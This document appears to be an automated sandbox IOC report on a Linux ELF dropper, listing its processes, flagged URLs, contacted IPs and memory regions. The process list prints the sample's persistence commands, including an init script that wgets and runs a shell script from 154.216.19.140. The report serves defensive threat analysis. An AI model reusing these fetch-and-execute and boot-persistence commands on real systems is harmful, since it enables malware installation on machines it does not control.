Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/dNBHFhYkoO.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/dNBHFhYkoO.elf

/bin/sh

sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/mybinary

/tmp/dNBHFhYkoO.elf

/bin/sh

sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary

/tmp/dNBHFhYkoO.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"

/tmp/dNBHFhYkoO.elf

/bin/sh

sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/sh

/tmp/dNBHFhYkoO.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/dNBHFhYkoO.elf

/bin/sh

sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/sh /etc/rc.d/S99sh

/tmp/dNBHFhYkoO.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 38 hidden processes, click here to show them.

URLs

Name

Malicious

http://154.216.19.140/curl.sh

unknown

Details

Name:	http://154.216.19.140/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/dNBHFhYkoO.elf
Source:	dNBHFhYkoO.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/lol.sh

unknown

Details

Name:	http://154.216.19.140/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/dNBHFhYkoO.elf
Source:	dNBHFhYkoO.elf

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://154.216.19.140/

unknown

Details

Name:	http://154.216.19.140/
TargetID:	-1
From Memory:	true
Source:	dNBHFhYkoO.elf, profile.12.dr, sh.36.dr, inittab.12.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.dr

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

Domains

Name

Malicious

daisy.ubuntu.com

162.213.35.24

IPs

Domain

Country

Malicious

155.54.22.144

unknown

Spain

101.7.174.124

unknown

China

113.148.67.128

unknown

Japan

18.100.108.89

unknown

United States

2.250.204.191

unknown

Sweden

179.203.149.152

unknown

Brazil

79.141.11.4

unknown

France

95.144.27.157

unknown

United Kingdom

175.221.14.33

unknown

Korea Republic of

184.168.152.44

unknown

United States

193.201.233.218

unknown

Romania

136.151.15.53

unknown

United States

32.0.166.233

unknown

United States

157.192.17.255

unknown

Japan

157.139.250.3

unknown

United States

128.147.255.20

unknown

United States

222.232.165.55

unknown

Korea Republic of

111.137.84.226

unknown

China

217.46.152.186

unknown

United Kingdom

135.186.67.231

unknown

United States

43.67.181.23

unknown

Japan

109.119.121.179

unknown

Italy

73.127.119.90

unknown

United States

198.52.135.134

unknown

Canada

9.255.203.5

unknown

United States

138.204.17.164

unknown

114.151.250.108

unknown

Japan

94.123.244.28

unknown

Turkey

99.172.111.203

unknown

United States

46.169.45.8

unknown

Poland

61.201.9.66

unknown

Japan

121.205.185.245

unknown

China

167.238.142.118

unknown

United States

52.204.165.158

unknown

United States

4.203.198.22

unknown

United States

188.192.219.235

unknown

Germany

63.40.92.240

unknown

United States

128.142.231.197

unknown

Switzerland

51.84.128.197

unknown

United States

70.58.129.46

unknown

United States

141.90.138.251

unknown

Germany

140.254.215.170

unknown

United States

117.34.212.135

unknown

China

169.219.234.199

unknown

Korea Republic of

210.68.246.214

unknown

Taiwan; Republic of China (ROC)

91.4.57.102

unknown

Germany

196.188.162.45

unknown

Ethiopia

147.87.251.207

unknown

Switzerland

73.135.234.77

unknown

United States

173.129.19.250

unknown

United States

211.74.253.30

unknown

Taiwan; Republic of China (ROC)

183.129.180.231

unknown

China

200.85.219.185

unknown

Chile

79.223.35.26

unknown

Germany

25.221.37.66

unknown

United Kingdom

51.163.203.68

unknown

United Kingdom

60.40.12.34

unknown

Japan

58.232.149.105

unknown

Korea Republic of

93.191.211.43

unknown

Germany

71.118.232.235

unknown

United States

120.7.177.50

unknown

China

19.206.72.119

unknown

United States

195.153.198.236

unknown

United Kingdom

18.46.90.227

unknown

United States

39.158.20.28

unknown

China

119.218.142.159

unknown

Korea Republic of

11.48.62.93

unknown

United States

136.79.30.52

unknown

United States

192.75.141.114

unknown

Canada

2.149.28.124

unknown

Norway

173.78.220.197

unknown

United States

205.44.168.73

unknown

United States

146.153.73.206

unknown

United States

206.36.132.167

unknown

United States

169.129.34.23

unknown

South Africa

90.75.170.85

unknown

France

60.5.57.195

unknown

China

221.194.73.27

unknown

China

203.194.100.255

unknown

India

136.13.98.133

unknown

United States

193.143.1.59

unknown

138.86.5.242

unknown

United States

133.127.39.181

unknown

Japan

197.249.173.39

unknown

Mozambique

202.92.241.150

unknown

Australia

172.236.97.162

unknown

United States

56.77.140.62

unknown

United States

156.94.193.22

unknown

United States

90.91.101.246

unknown

France

37.18.191.27

unknown

Serbia

93.194.158.243

unknown

Germany

17.64.219.170

unknown

United States

45.71.33.122

unknown

Peru

73.123.195.208

unknown

United States

132.38.57.36

unknown

United States

160.192.10.159

unknown

Japan

198.31.179.76

unknown

United States

144.227.18.9

unknown

United States

133.36.85.217

unknown

Japan

194.251.23.56

unknown

Finland

There are 90 hidden IPs, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

805f000

page execute read

805f000

page execute read

f7f87000

page execute read

8060000

page read and write

8062000

page read and write

ffb41000

page read and write

f7f87000

page execute read

85ac000

page read and write

8060000

page read and write

8062000

page read and write

ffb41000

page read and write

85b1000

page read and write

85ac000

page read and write

There are 3 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
dNBHFhYkoO.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC ReportdNBHFhYkoO.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
dNBHFhYkoO.elf